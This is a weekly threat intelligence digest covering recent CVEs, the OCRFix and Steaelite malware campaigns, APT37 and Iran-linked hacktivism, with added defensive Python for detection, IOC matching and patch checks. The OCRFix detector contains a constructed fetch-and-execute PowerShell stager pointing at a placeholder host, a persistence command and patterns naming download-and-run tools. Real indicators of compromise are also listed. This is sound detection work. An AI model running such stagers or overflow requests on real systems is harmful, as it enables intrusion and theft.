Cyber Threat Intelligence Digest: Week 9

4th March 2026 - Threat Reports
  • Vulnerabilities
  • Potential Threats
  • General News
  • Threat Actor Weekly Graph
  • Global Trends Powered by Recorded Future
  • Prominent Information Security Events
  • Remediation Actions

Executive Summary -
Highlights of Cyber Threat Intelligence Digest

Vulnerabilities

Rapid7 Discloses Grandstream Flaw CVE-2026-2329 - On 18 February 2026, Rapid7 disclosed a critical vulnerability, CVE-2026-2329, affecting Grandstream GXP1600 series VoIP phones. The issue has a severity score of 9.3 and impacts the following models: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628 and GXP1630. Grandstream fixed the flaw in firmware version 1.0.7.81. At the time of writing, there have been no public reports of the vulnerability being actively exploited.

The vulnerability affects the /cgi-bin/api.values.get endpoint in the device’s web-based API service. This service is exposed over HTTP on TCP port 80 by default and does not require authentication. The endpoint processes a request parameter made up of colon-separated identifiers and copies each one into a 64-byte buffer in memory without checking its length.

By sending an identifier that is longer than expected, an attacker can overwrite nearby memory on the stack, including the return address and program counter. If successfully exploited, this allows remote code execution with root privileges. This could enable an attacker to extract credentials, modify device settings and fully compromise the affected phone.
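Because the endpoint is unauthenticated and reachable on port 80, the simplest network-side check is to watch for requests to it whose colon-separated identifiers could not fit the 64-byte buffer. The following is an added example, not Rapid7's or Grandstream's code: it scans HTTP request lines (as a proxy or network sensor would record them) and flags any identifier of 64 bytes or more. The report does not name the query parameter, so every parameter is inspected; the parameter name `request` and the identifiers in the sample lines are constructed for the example.

```python
"""Flag requests to the Grandstream api.values.get endpoint whose
colon-separated identifiers would not fit the 64-byte buffer.

Added example, not vendor or Rapid7 code. The query parameter name is not
given in the report, so every parameter is checked; the sample request
lines below are constructed, not captured traffic.
"""
from urllib.parse import parse_qsl, urlsplit

ENDPOINT = "/cgi-bin/api.values.get"
BUFFER_LIMIT = 64  # size of the on-device buffer described in the advisory summary


def overlong_identifiers(request_line: str, limit: int = BUFFER_LIMIT) -> list:
    """Return the identifiers in one HTTP request line that exceed the buffer.

    request_line looks like "GET /path?x=a:b HTTP/1.1". Requests to other
    endpoints, or with only short identifiers, return [].
    """
    parts = request_line.split()
    if len(parts) < 2:
        return []
    target = urlsplit(parts[1])
    if target.path != ENDPOINT:
        return []
    flagged = []
    # parse_qsl percent-decodes values, so the check sees what the device would see;
    # keep_blank_values keeps "a::b" from being silently dropped.
    for _name, value in parse_qsl(target.query, keep_blank_values=True):
        for ident in value.split(":"):
            # A C string needs its NUL terminator too, so 64 bytes already overflows.
            if len(ident.encode()) >= limit:
                flagged.append(ident)
    return flagged


def scan(lines) -> list:
    """Return (line_number, identifiers) for every suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = overlong_identifiers(line)
        if found:
            hits.append((n, found))
    return hits


# Constructed sample traffic: a benign page fetch, a normal-looking call with
# short identifiers, and one identifier far longer than the buffer.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.1",
    "GET /cgi-bin/api.values.get?request=phone_model:fw_version HTTP/1.1",
    "GET /cgi-bin/api.values.get?request=" + "A" * 200 + ":x HTTP/1.1",
]

if __name__ == "__main__":
    for n, idents in scan(SAMPLE_REQUESTS):
        print(f"line {n}: {len(idents)} identifier(s) of {BUFFER_LIMIT}+ bytes")
```

Any hit from a source outside the VoIP management network is worth an alert regardless of whether the phones are already on 1.0.7.81; a legitimate client has no reason to send identifiers of that length.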

Google Chrome Patches Three Chrome Vulnerabilities (CVE-2026-2648, CVE-2026-2649, CVE-2026-2650) - On 18 February 2026, Google patched three vulnerabilities in its Chrome web browser, identified as CVE-2026-2648, CVE-2026-2649 and CVE-2026-2650. The fixes were released in Chrome version 145.0.7632.109/110 for Windows and macOS, and version 144.0.7559.109 for Linux. At the time of writing, there have been no reports of these vulnerabilities being actively exploited.

CVE-2026-2648 is a memory corruption flaw in Chrome’s PDFium component that could allow an attacker to write data beyond allocated memory limits using a specially crafted PDF file. CVE-2026-2649 is an integer overflow vulnerability in Chrome’s V8 JavaScript engine that could allow an attacker to corrupt heap memory through a specially crafted HTML page. CVE-2026-2650 is a heap buffer overflow vulnerability in Chrome’s Media component that could also allow heap memory corruption via a specially crafted HTML page.

Microsoft Patches CVE-2026-20817 - On 18 February 2026, core-jmp released a proof of concept for CVE-2026-20817, a vulnerability with a severity score of 7.8 that affects Microsoft Windows 10, Windows 11, Windows Server 2019 and Windows Server 2022. Instead of adding a direct authorisation check, Microsoft addressed the issue by enabling a feature flag that disables the vulnerable functionality. At the time of writing, there have been no public reports of active exploitation in the wild.

The vulnerability exists in the Windows Error Reporting (WER) service and is caused by insufficient authorisation checks in a method exposed through Advanced Local Procedure Call (ALPC) within the file wersvc.dll. The affected method, SvcElevatedLaunch, accepts ALPC messages and creates a privileged process without properly verifying the trust level of the caller. If successfully exploited, a local attacker can cause the system to create a process running with SYSTEM-level privileges. 

Potential Threats

OCRFix Campaign Combines ClickFix and EtherHiding to Deliver Multi-Stage Botnet Malware - On 25 February 2026, cybersecurity researchers reported on a phishing campaign known as OCRFix that uses social engineering to infect systems and enroll them into a centrally controlled botnet. The campaign impersonates the legitimate Tesseract OCR software using a lookalike website and tricks victims into manually running malicious PowerShell commands. This method combines two techniques: one that persuades users to execute harmful commands themselves, and another that hides command-and-control information inside blockchain smart contracts to make the infrastructure harder to trace.

The infection begins when victims reach the fake website through search engine manipulation or malicious adverts and are shown a fake verification prompt instructing them to copy and paste a command into PowerShell. This launches a multi-stage infection process that downloads and installs further malware components. The malware disables security protections, creates scheduled tasks to maintain persistence, and registers the infected system with a remote control server. It then collects system information such as device name, operating system and internal network details and regularly checks in for instructions.

The final stage connects to a bot management server that allows the attacker to control infected devices and issue commands, including downloading and running additional payloads. Analysis showed the malware is capable of keylogging, taking screenshots, scanning networks, modifying system settings and evading detection. Some of the infrastructure used in the campaign remains active, indicating the operation may still be ongoing.

Steaelite RAT Employs Credential Theft and Ransomware for Double Extortion Operations - On 24 February 2026, cybersecurity researchers published an analysis of Steaelite, a remote access trojan that has been sold on underground forums since late 2025. The malware is designed to fully compromise infected systems and supports credential theft, file collection, live surveillance, remote command execution and ransomware deployment through a single web-based control panel. It is advertised as difficult to detect on Windows systems and includes features such as hidden remote desktop access, banking application bypass and an Android ransomware module that is still under development.

Once a victim system connects to the attacker’s infrastructure, Steaelite automatically collects stored browser passwords, session cookies and application tokens before any commands are issued. It also sends system information to the control panel, including device name, hardware identifiers and operating system details, giving the attacker real-time visibility of the infected machine. From the control panel, the attacker can browse and manage files, stream the victim’s desktop, access the webcam and microphone, log keystrokes, manipulate clipboard contents, track the device’s location, launch denial-of-service attacks and deploy ransomware for extortion.

Technical analysis showed that the malware can inject itself into other processes, harvest browser data, enumerate running applications and enable elevated privileges. It also includes functions for persistence, disabling security protections, spreading via removable media and removing other malware. Additional capabilities include debugger detection, delayed execution to evade security tools and termination of running processes, indicating the malware is designed for long-term control and surveillance of compromised systems.

APT37 Targets Internet Connected and Air-Gapped Systems with Custom Malware - On 26 February 2026, researchers reported on a December 2025 cyber-espionage campaign known as “Ruby Jumper” carried out by APT37, a threat group linked to North Korea. The campaign targeted politically relevant individuals, including researchers, analysts, journalists and government-affiliated personnel who monitor North Korea–related issues. Evidence suggests the activity aligned with North Korean intelligence interests and also targeted Arabic-speaking audiences using material focused on the Israel–Hamas conflict, indicating broader surveillance beyond the Korean Peninsula.

The campaign began with malicious shortcut (LNK) files that launched PowerShell scripts to install malware in memory. Additional components were used to establish persistence and disguise malicious activity as legitimate software. The attackers relied on trusted cloud services for command-and-control communications to blend in with normal network traffic and avoid detection.

The malware set included tools for infecting removable media and using USB devices to transfer data and commands across isolated or restricted networks. Other payloads provided long-term backdoor access and surveillance features such as keystroke logging, screen and audio capture, file discovery and data exfiltration. Overall, the activity indicates a sustained intelligence-gathering operation focused on politically engaged targets.

General News

Claimed Cyberattacks Relating to US-Israel and Iran Continue to Escalate in Jordan - On 1 March 2026, Sophos reported that a pro-Iranian hacktivist group operating under the Telegram channel name “Handla Hack” had claimed responsibility for attacks in Jordan. Analysts assessed with high confidence that “Handla Hack” is simply another name used by the Handala Hack Team, based on overlapping claims against the same victims. Intelligence analysis identified several social media posts in which Handala claimed responsibility for attacks on a Jordanian petrol station and announced future attacks against Saudi Arabia’s cyber infrastructure.

This assessment is consistent with separate reporting that an unidentified threat group had claimed an attack targeting fuel infrastructure in Jordan. The alleged activity in Jordan represents an update to earlier reporting on Iran-linked hacktivist retaliation claims following strikes by the United States and Israel. In separate reporting, Israeli and US media described distributed denial-of-service attacks against energy and aviation infrastructure systems. An Iran-linked hacktivist group known as Cyber Islamic Resistance also reportedly claimed to have targeted Rafael Advanced Defense Systems, and cybersecurity analysts confirmed they are tracking all related activity under a campaign referred to as “The Great Epic.”

Anthropic's Claude Experiences Partial Service Outage; No Confirmed Cyberattack - On 2 March 2026, Anthropic reported a partial service outage that disrupted access to Claude.ai, the Claude Console, the Claude API, Claude Code and Claude for Government services. The company initially identified problems affecting the login and logout functions of Claude.ai, and later confirmed that some API methods were also not working as expected. User reports indicated login failures, slow response times and access errors across both the mobile and web versions of Claude. A fix was introduced at 13:22 UTC, and the incident was marked as resolved at 15:47 UTC. At the time of writing, there is no evidence to suggest the disruption was caused by a cyberattack.

UK Warns of Iranian Cyber Attack Risks amid Middle East Conflict - The UK’s National Cyber Security Centre has warned British organisations of a heightened risk of Iranian cyber activity linked to the conflict in the Middle East, particularly for those with operations or supply chains in the region. While there is no immediate increase in direct threats to the UK, the situation could change quickly and Iranian state-linked actors are still believed capable of launching attacks despite domestic internet disruption. Organisations are advised to strengthen their cyber security by following existing guidance on DDoS attacks, phishing and industrial control system threats, reviewing their external attack surface and increasing monitoring. The warning follows similar alerts from US authorities about the growing risk from Iran-aligned hacking groups.


Threat Actor Weekly Graph

Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.

Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.

Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.

Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.


Severity scale: Limited, Basic, Moderate, High

Threat Actor                   Severity (previous / current)   Opportunity (previous / current)   Intent (previous / current)
CL0P Ransomware Group          High / High                     81 / 82                            49 / 49
Dragon Force Group             Moderate / Moderate             66 / 65                            49 / 49
Kazu                           NEW / Basic                     NEW / 30                           NEW / 31
RocketRacoon                   NEW / Basic                     NEW / 30                           NEW / 25
CipherForce Ransomware Group   NEW / Basic                     NEW / 25                           NEW / 30

Global Trends Powered by Recorded Future

Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.

The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.

- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.

Attackers                        Methods              Vulnerabilities   Targets
Pakistan                         Medusa Ransomware    CVE-2025-2185     Apple
SloppyLemming                    DragonForce          CVE-2026-21513    UAE
Israel                           DDoS                 CVE-2026-1731     Bahrain
Islamic Cyber Resistance Group   Identity Theft       CVE-2023-3452     Qatar
Hezbollah                        TA0040               CVE-2025-0282     Sharjah


Prominent Information Security Events

OCRFix Campaign Combines ClickFix and EtherHiding to Deliver Multi-Stage Botnet Malware

Source: Insikt Group | Validated Intelligence Event

IOC: Hash - 14621a2a5513825f058530c8c5f64178003ec4aa5ae6c00bab99161e27c5042e

IOC: URL - 1e81ea2a059f[.]ngrok[-]free[.]app

On 25 February 2026, cybersecurity researchers reported on a phishing campaign known as OCRFix that uses social engineering to infect systems and enroll them into a centrally controlled botnet. The campaign impersonates the legitimate Tesseract OCR software using a lookalike website and tricks victims into manually running malicious PowerShell commands. This method combines user-assisted execution with stealthy command-and-control techniques, including hiding control data inside blockchain smart contracts to make the infrastructure harder to track and disrupt.

Victims are typically lured to the fake site via search engine manipulation or malicious advertising and presented with a fake “verification” or “setup” step that instructs them to copy and paste a command into PowerShell. Executing this command initiates a multi-stage infection chain that downloads additional payloads from remote servers and executes them in memory to reduce on-disk artefacts. The malware disables security features, creates scheduled tasks for persistence, and establishes a unique identifier for each infected host.

Once installed, the malware collects system information such as hostname, operating system version, user privileges and internal network details, and periodically communicates with a control server for instructions. The final stage connects to a bot management panel that allows operators to issue commands, deploy further malware, and update functionality as needed. Capabilities observed include keylogging, screenshot capture, network scanning, system configuration changes and basic evasion techniques. Some command-and-control infrastructure remains active, suggesting the campaign may still be ongoing and capable of onboarding new victims.
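The two OCRFix write-ups in this digest describe the same observable sequence on the endpoint: a PowerShell one-liner pasted by the user, a download-and-execute stage, and a scheduled task for persistence. The following is an added example that covers both entries and is not the researchers' or Recorded Future's detection logic: it scores process-creation events for those traits and checks whether a flagged PowerShell launch is followed by task creation. The event fields (parent, image, command line), the indicator weights, the `ocr-lookalike.example` host and the sample events are all constructed for the example.

```python
"""Score Windows process-creation events for the ClickFix-style PowerShell
launch and scheduled-task persistence described in the OCRFix reports.

Added example, not the researchers' or Recorded Future's code. The event
shape, indicator weights, placeholder host and sample events are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str         # image name of the parent process
    image: str          # image name of the new process
    command_line: str


POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# (weight, pattern): traits of a one-liner a victim is told to paste.
COMMAND_INDICATORS = [
    (2, re.compile(r"-(w|win|windowstyle)\s+hidden", re.I)),          # hidden window
    (2, re.compile(r"-(ep|exec|executionpolicy)\s+bypass", re.I)),   # policy bypass
    (2, re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    (3, re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient)\b", re.I)),
    (3, re.compile(r"\b(iex|invoke-expression)\b", re.I)),            # run what was fetched
    (3, re.compile(r"\b(set|add)-mppreference\b", re.I)),             # tampering with Defender settings
]
PERSISTENCE = re.compile(r"\bschtasks(\.exe)?\b.*\s/create\b", re.I)


def score_event(ev: ProcEvent) -> int:
    """Suspicion score for one event; 0 means no indicator matched."""
    score = 0
    if ev.image.lower() in POWERSHELL_IMAGES:
        if ev.parent.lower() == "explorer.exe":
            score += 2   # started from the desktop shell, as a pasted command is
        for weight, pattern in COMMAND_INDICATORS:
            if pattern.search(ev.command_line):
                score += weight
    if PERSISTENCE.search(ev.command_line):
        score += 2       # scheduled-task persistence, whatever the parent
    return score


def flag_events(events, threshold: int = 6) -> list:
    """(index, score) for every event at or above the threshold."""
    return [(i, score_event(ev)) for i, ev in enumerate(events) if score_event(ev) >= threshold]


def chain_detected(events, threshold: int = 6) -> bool:
    """True when a flagged PowerShell launch is later followed by task creation."""
    seen_launcher = False
    for ev in events:
        if ev.image.lower() in POWERSHELL_IMAGES and score_event(ev) >= threshold:
            seen_launcher = True
        elif seen_launcher and PERSISTENCE.search(ev.command_line):
            return True
    return False


# Constructed events: a benign editor launch, the pasted stager (with a
# placeholder lookalike host), its persistence step, and a legitimate
# scheduled script started by the service manager.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "notepad.exe", r"notepad.exe C:\Users\alice\notes.txt"),
    ProcEvent("explorer.exe", "powershell.exe",
              'powershell.exe -w hidden -ep bypass -c "iex (irm http://ocr-lookalike.example/setup)"'),
    ProcEvent("powershell.exe", "schtasks.exe",
              r'schtasks.exe /create /sc minute /mo 15 /tn "OCRUpdate" /tr "C:\Users\Public\ocr.exe"'),
    ProcEvent("services.exe", "powershell.exe", r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for i, s in flag_events(SAMPLE_EVENTS):
        print(f"event {i}: score {s}: {SAMPLE_EVENTS[i].command_line}")
    print("launch + persistence chain:", chain_detected(SAMPLE_EVENTS))
```

The threshold is deliberately above the score a single trait can reach, so an administrator's hidden-window script or an unattended `-ExecutionPolicy Bypass` job does not fire on its own; the download-and-execute pair does, and the persistence check gives the analyst the second half of the chain in the same view.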

Steaelite RAT Employs Credential Theft and Ransomware for Double Extortion Operations

Source: Insikt Group | Validated Intelligence Event

IOC: Hash - b2a8d97da2a653de75d3d1be583910233a81a3794364e19ee4bc352b06b48f36

IOC: IP - 149[.]248[.]11[.]71

On 24 February 2026, cybersecurity researchers published an analysis of Steaelite, a remote access trojan that has been sold on underground forums since late 2025. The malware is marketed as an all-in-one toolkit for cybercriminals, providing full control over compromised systems through a single web-based management panel. It is promoted as being difficult to detect on Windows and includes advanced features such as hidden remote desktop access, banking application bypass techniques and an Android ransomware module that is still under active development.

Once a victim system connects to the attacker’s infrastructure, Steaelite immediately begins harvesting stored browser credentials, session cookies and authentication tokens before receiving any further instructions. It also collects and transmits detailed system profiling data, including device name, hardware identifiers, installed software and operating system information, allowing operators to prioritise valuable targets. The central control panel provides real-time interaction with infected machines, enabling attackers to browse files, stream the desktop, activate the webcam and microphone, log keystrokes, manipulate clipboard data and track approximate location.

From the same interface, operators can execute remote commands, launch denial-of-service attacks and deploy ransomware payloads for extortion. Technical analysis revealed that Steaelite can inject into legitimate processes, enumerate running applications and attempt privilege escalation to maintain deeper system access. It supports multiple persistence mechanisms, disables security protections, spreads via removable media and can remove competing malware from infected systems. Additional features such as debugger detection, delayed execution and forced termination of security-related processes indicate the malware is designed for stealth, resilience and long-term surveillance of compromised hosts.
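The OCRFix and Steaelite entries each come with defanged indicators (a hash and a hostname, a hash and an IP). The following is an added example, not Recorded Future's or Insikt Group's tooling: it parses those `IOC:` lines as printed in this digest, refangs them, and matches them against log lines with boundaries so a shorter address or hash prefix does not produce a false hit. The log lines are constructed and use private or documentation addresses for the non-IOC hosts.

```python
"""Refang the defanged indicators printed in this digest and look for them
in log lines and file-hash records.

Added example, not Recorded Future's or Insikt Group's tooling. The
indicator values are the ones listed in the OCRFix and Steaelite entries;
the log lines are constructed.
"""
import re

DIGEST_IOCS = """
IOC: Hash - 14621a2a5513825f058530c8c5f64178003ec4aa5ae6c00bab99161e27c5042e
IOC: URL - 1e81ea2a059f[.]ngrok[-]free[.]app
IOC: Hash - b2a8d97da2a653de75d3d1be583910233a81a3794364e19ee4bc352b06b48f36
IOC: IP - 149[.]248[.]11[.]71
"""

IOC_LINE = re.compile(r"^IOC:\s*(?P<kind>Hash|URL|IP|Domain)\s*-\s*(?P<value>\S+)", re.I | re.M)


def refang(value: str) -> str:
    """Undo the usual defanging ([.] [-] [:] hxxp) and normalise case."""
    value = value.replace("[.]", ".").replace("[-]", "-").replace("[:]", ":")
    value = re.sub(r"^hxxp", "http", value, flags=re.I)
    return value.lower()


def parse_iocs(text: str) -> dict:
    """{kind: set of refanged values} from digest-style 'IOC: <kind> - <value>' lines."""
    iocs = {}
    for m in IOC_LINE.finditer(text):
        iocs.setdefault(m.group("kind").lower(), set()).add(refang(m.group("value")))
    return iocs


def match_lines(iocs: dict, lines) -> list:
    """(line_no, kind, value) for every indicator found in each line.

    The match is bounded so 149.248.11.7 would not fire on 149.248.11.71 and
    a hash prefix does not match a longer hash.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        haystack = refang(line)   # some log pipelines defang on export too
        for kind, values in iocs.items():
            for value in sorted(values):
                if re.search(r"(?<![\w.])" + re.escape(value) + r"(?![\w.])", haystack):
                    hits.append((n, kind, value))
    return hits


# Constructed log lines: proxy, EDR file event, firewall, and one clean line.
SAMPLE_LOG = [
    "2026-02-25T10:14:02Z proxy CONNECT 1e81ea2a059f.ngrok-free.app:443 client=10.0.0.12",
    r"2026-02-25T10:14:05Z edr file_created path=C:\Users\Public\ocr.exe "
    "sha256=14621a2a5513825f058530c8c5f64178003ec4aa5ae6c00bab99161e27c5042e",
    "2026-02-26T08:02:11Z fw allow 10.0.0.12 -> 149.248.11.71:8080",
    "2026-02-26T08:03:00Z fw allow 10.0.0.12 -> 192.0.2.10:443",
]

if __name__ == "__main__":
    for n, kind, value in match_lines(parse_iocs(DIGEST_IOCS), SAMPLE_LOG):
        print(f"line {n}: {kind} {value}")
```

The same parser can be pointed at the IOC lines of future digests unchanged; only the `DIGEST_IOCS` text needs replacing.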

Remediation Actions

Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable: 

  • CVE-2026-2329 (Grandstream GXP1600 series) – This vulnerability can be addressed by upgrading affected devices (GXP1610, GXP1615, GXP1620, GXP1625, GXP1628 and GXP1630) to firmware version 1.0.7.81.
  • CVE-2026-2648 / CVE-2026-2649 / CVE-2026-2650 (Google Chrome) – These vulnerabilities can be addressed by upgrading Chrome to version 145.0.7632.109/110 for Windows and macOS, and 144.0.7559.109 for Linux.
  • CVE-2026-20817 (Microsoft Windows) – This vulnerability can be addressed by applying the latest Microsoft security updates for Windows 10, Windows 11, Windows Server 2019 and Windows Server 2022, which disable the vulnerable functionality.
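Checking an inventory against these fixed versions is easy to get wrong with plain string comparison ("9.0" sorts above "10.0" as text). The following is an added example, not Acumen Cyber's tooling: it compares dotted version strings numerically against the Chrome and Grandstream fixed versions listed above. The Windows item is left out because the digest gives no version string to compare against, and the inventory records are constructed.

```python
"""Compare installed version strings with the fixed versions given in the
remediation list, so inventory records can be sorted into patched and not.

Added example, not Acumen Cyber's tooling. The fixed versions are the ones
stated in this digest (Chrome per platform, Grandstream GXP1600 firmware);
the inventory records are constructed.
"""

# Minimum patched version per (product, platform). Chrome's
# "145.0.7632.109/110" means either build is fixed, so 109 is the floor.
FIXED_VERSIONS = {
    ("chrome", "windows"): "145.0.7632.109",
    ("chrome", "macos"): "145.0.7632.109",
    ("chrome", "linux"): "144.0.7559.109",
    ("grandstream-gxp1600", "firmware"): "1.0.7.81",
}


def parse_version(text: str) -> tuple:
    """'145.0.7632.110' -> (145, 0, 7632, 110).

    Numeric tuples compare correctly where plain strings do not. A shorter
    tuple sorts below a longer one with the same prefix, so '1.0.7' counts
    as older than '1.0.7.81'. A non-numeric part raises rather than guessing.
    """
    return tuple(int(part) for part in text.strip().split("."))


def is_patched(product: str, platform: str, installed: str) -> bool:
    """True when the installed version is at or above the fixed version."""
    fixed = FIXED_VERSIONS[(product.lower(), platform.lower())]
    return parse_version(installed) >= parse_version(fixed)


def unpatched(inventory) -> list:
    """(host, product, installed) for every record below its fixed version."""
    return [(host, product, installed)
            for host, product, platform, installed in inventory
            if not is_patched(product, platform, installed)]


# Constructed inventory records: (host, product, platform, installed version).
INVENTORY = [
    ("ws-01", "chrome", "windows", "145.0.7632.110"),
    ("ws-02", "chrome", "windows", "145.0.7632.108"),
    ("mac-03", "chrome", "macos", "146.0.7700.50"),
    ("srv-lx1", "chrome", "linux", "144.0.7559.109"),
    ("phone-17", "grandstream-gxp1600", "firmware", "1.0.7.15"),
    ("phone-18", "grandstream-gxp1600", "firmware", "1.0.7.81"),
]

if __name__ == "__main__":
    for host, product, installed in unpatched(INVENTORY):
        print(f"{host}: {product} {installed} needs updating")
```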

If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.